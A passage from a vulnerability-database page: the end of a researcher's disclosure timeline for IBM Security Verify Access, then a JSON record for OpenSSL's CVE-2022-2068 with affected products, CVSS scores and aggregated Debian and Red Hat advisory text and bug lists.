  • May 23, 2024: I replied that there's not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities.
  • May 24, 2024: IBM stated they would provide me with additional CVEs.
  • May 30, 2024: I confirmed that the creation of additional CVEs is fair.
  • Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356.
  • Jun 3, 2024: I asked IBM the release date of the 10.0.8 version.
  • Jun 3, 2024: IBM confirmed that the exact date was not yet decided.
  • Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities.
  • Jun 8, 2024: I asked IBM the status of a previously patched vulnerability.
  • Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release.
  • Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities.
  • Jun 19, 2024: IBM asked if I needed assistance.
  • Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities.
  • Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin.
  • Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket.
  • Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported.
  • Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket.
  • Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges.
  • Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory.
  • Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched.
  • Nov 1, 2024: A security advisory is published.

Credits

These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).

References

https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html

https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt

https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html

https://pierrekim.github.io/advisories/2024-ibmsecurity.txt

https://www.ibm.com/support/pages/node/7106586

https://www.ibm.com/support/pages/node/7145400

https://www.ibm.com/support/pages/node/7155356

https://www.ibm.com/support/pages/node/7158790

Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T LbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz eJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe ecOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ VR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq mPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE +NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE qz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj 24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As +akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC V8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7 Y7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU= =3Ax6 -----END PGP SIGNATURE-----

Show details on source website
To clipboard 

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "h610s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "3.0.4"
      },
      {
        "_id": null,
        "model": "snapmanager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "aff a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ontap select deploy administration utility",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "35"
      },
      {
        "_id": null,
        "model": "sannav",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h410s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h615c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1p"
      },
      {
        "_id": null,
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "36"
      },
      {
        "_id": null,
        "model": "fas 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "bootstrap os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fas 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "fas a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2zf"
      },
      {
        "_id": null,
        "model": "aff 8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "aff 8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h610c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "h500s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "element software",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "sinec ins",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.0"
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.1.1"
      },
      {
        "_id": null,
        "model": "smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "3.0.0"
      },
      {
        "_id": null,
        "model": "ontap antivirus connector",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "santricity smi-s provider",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2022-2068",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2022-2068",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.3,
            "id": "CVE-2022-2068",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2022-2068",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-2068",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2022-2068",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2022-2068",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:\n\nRed Hat Ceph Storage is a scalable, open, software-defined storage platform\nthat combines the most stable version of the Ceph storage system with a\nCeph management platform, deployment utilities, and support services. \n\nSpace precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):\n\n2031228 - CVE-2021-43813 grafana: directory traversal vulnerability\n2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources\n2115198 - build ceph containers for RHCS 5.2 release\n\n5. \n\nFor the oldstable distribution (buster), this problem has been fixed\nin version 1.1.1n-0+deb10u3. \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1.1.1n-0+deb11u3. \n\nWe recommend that you upgrade your openssl packages. \n\nFor the detailed security status of openssl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/openssl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmK4pF0ACgkQEMKTtsN8\nTjYP5g//SyfB1W/vUNmgeSp2kKu3vt9CPwoXMK8nhTcA7iYhkxIJTFxAWDpn+4S7\nW4kYyxMRFSIHKv4FLiLgi/Vzn4g1kB1UvKv05CFhEJqpWMyyRj6FdmebLlkLG0eE\nIGsZoQl9be+lRJ+E4oMMkrRkbJV5II7s69vdxFDh4893Ndx05GWWvXT5Doc5gFMi\nNoNabBH47GFU6aGDwVJU+xooBT6s4QMOrgVKYbxhM5PO98HQzk0zv0Z6YRx7FzKD\nhYMN/t6A8qj4zMQqJqM+44q9zpDryyolGLewvgOit1HFFnLlBf4wsdBvE7AGhvGs\nLam5OXLhlwlQT6gBNd4XFAShdEZGLVF2DCgKzMh5cG5r2W10ewfHHyOR4CnkMQQP\nePA8YvhVwSH3I5jOTS75A18LXpoRJKRXQuQ7v9di2C8qRZ0qnM95h0KzH9/UKyUc\nTmF09MTKWoFCkCtyzucdPnoyUPhdScJc08jcGJ37MCb8uKI4F5jVImLnHC6qS6Oc\nGab3OPIDzS8I1rro0J1k8RJE1E8XvfCxgVAOoebn0mst8qT+38hqsTFykG+uq3dN\nsfhwI+E8iOeVOapyDVzxz8DfIkyBdnFsM4cg9VxDPOOllN+BknySqvzxu+aYpMFz\nK/D6g421XIIXPXD+sP/w1ENPV7LFobRR7KXUWvjS5l/Ir8dhPdQ=\n=tiWq\n-----END PGP SIGNATURE-----\n. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nLogging Subsystem 5.5.0 - Red Hat OpenShift\n\nSecurity Fix(es):\n\n* kubeclient: kubeconfig parsing error can lead to MITM attacks\n(CVE-2022-0759)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* prometheus/client_golang: Denial of service using\nInstrumentHandlerCounter (CVE-2022-21698)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter\n2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1415 - Allow users to tune fluentd\nLOG-1539 - Events and CLO csv are not collected after running `oc adm must-gather --image=$downstream-clo-image `\nLOG-1713 - Reduce Permissions granted for prometheus-k8s service account\nLOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created. \nLOG-2134 - The infra logs are sent to app-xx indices\nLOG-2159 - Cluster Logging Pods in CrashLoopBackOff\nLOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages. \nLOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL\nLOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext. \nLOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not  be collected. \nLOG-2242 - Log file metric exporter is still following /var/log/containers files. \nLOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed\nLOG-2264 - Logging link should contain an icon\nLOG-2274 - [Logging 5.5] EO doesn\u0027t recreate secrets kibana and kibana-proxy after removing them. \nLOG-2276 - Fluent config format is hard to read via configmap\nLOG-2290 - ClusterLogging Instance status in not getting updated in UI\nLOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1\nLOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint. \nLOG-2300 - [Logging 5.5]ES pods can\u0027t be ready after removing secret/signing-elasticsearch\nLOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck\nLOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously\nLOG-2333 - Journal logs not reaching Elasticsearch output\nLOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record. \nLOG-2342 - [Logging 5.5] Kibana pod can\u0027t connect to ES cluster after removing secret/signing-elasticsearch: \"x509: certificate signed by unknown authority\"\nLOG-2384 - Provide a method to get authenticated from GCP\nLOG-2411 - [Vector] Audit logs forwarding not working. \nLOG-2412 - CLO\u0027s loki output url is parsed wrongly\nLOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type\nLOG-2418 - EO supported time units don\u0027t match the units specified in CRDs. \nLOG-2439 - Telemetry: the managedStatus\u0026healthStatus\u0026version values are wrong\nLOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift\nLOG-2444 - The write index is removed when `the size of the index` \u003e `diskThresholdPercent% * total size`. \nLOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster. \nLOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack. \nLOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices\nLOG-2474 - EO shouldn\u0027t grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]\nLOG-2522 - CLO supported time units don\u0027t match the units specified in CRDs. \nLOG-2525 - The container\u0027s logs are not sent to separate index if the annotation is added after the pod is ready. \nLOG-2546 - TLS handshake error on loki-gateway for FIPS cluster\nLOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector. \nLOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data\nLOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated. \nLOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate\nLOG-2599 - Supported values for level field don\u0027t match documentation\nLOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert\nLOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect\nLOG-2619 - containers violate PodSecurity -- Log Exporation\nLOG-2627 - containers violate PodSecurity -- Loki\nLOG-2649 - Level Critical should match the beginning of the line as the other levels\nLOG-2656 - Logging uses deprecated v1beta1 apis\nLOG-2664 - Deprecated Feature logs causing too much noise\nLOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster\nLOG-2693 - Integration with Jaeger fails for ServiceMonitor\nLOG-2700 - [Vector] vector container can\u0027t start due to \"unknown field `pod_annotation_fields`\" . \nLOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance\nLOG-2725 - Upgrade logging-eventrouter Golang  version and tags\nLOG-2731 - CLO keeps reporting `Reconcile ServiceMonitor retry error` and `Reconcile Service retry error` after creating clusterlogging. \nLOG-2732 - Prometheus Operator pod throws \u0027skipping servicemonitor\u0027 error on Jaeger integration\nLOG-2742 - unrecognized outputs when use the sts role secret\nLOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs\nLOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows \"active_primary\" instead of \"active\" shards. \nLOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo\nLOG-2763 - [Vector]{Master} Vector\u0027s healthcheck fails when forwarding logs to Lokistack. \nLOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image\nLOG-2765 - ingester pod can not be started in IPv6 cluster\nLOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy\nLOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx\nLOG-2773 - No cluster-logging-operator-metrics  service in logging 5.5\nLOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. \nLOG-2784 - Japanese log messages are garbled at Kibana\nLOG-2793 - [Vector] OVN audit logs are missing the level field. \nLOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF\nLOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. \nLOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. \nLOG-2875 - Seeing a black rectangle box on the graph in Logs view\nLOG-2876 - The link to the \u0027Container details\u0027 page on the \u0027Logs\u0027 screen throws error\nLOG-2877 - When there is no query entered, seeing error message on the Logs view\nLOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in \u0027Logs\u0027 screen\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-38561\nhttps://access.redhat.com/security/cve/CVE-2022-0759\nhttps://access.redhat.com/security/cve/CVE-2022-1012\nhttps://access.redhat.com/security/cve/CVE-2022-1292\nhttps://access.redhat.com/security/cve/CVE-2022-1586\nhttps://access.redhat.com/security/cve/CVE-2022-1785\nhttps://access.redhat.com/security/cve/CVE-2022-1897\nhttps://access.redhat.com/security/cve/CVE-2022-1927\nhttps://access.redhat.com/security/cve/CVE-2022-2068\nhttps://access.redhat.com/security/cve/CVE-2022-2097\nhttps://access.redhat.com/security/cve/CVE-2022-21698\nhttps://access.redhat.com/security/cve/CVE-2022-30631\nhttps://access.redhat.com/security/cve/CVE-2022-32250\nhttps://access.redhat.com/security/updates/classification/#important\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. Summary:\n\nRed Hat OpenShift Virtualization release 4.12 is now available with updates\nto packages and images that fix several bugs and add enhancements. Description:\n\nOpenShift Virtualization is Red Hat\u0027s virtualization solution designed for\nRed Hat OpenShift Container Platform. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit 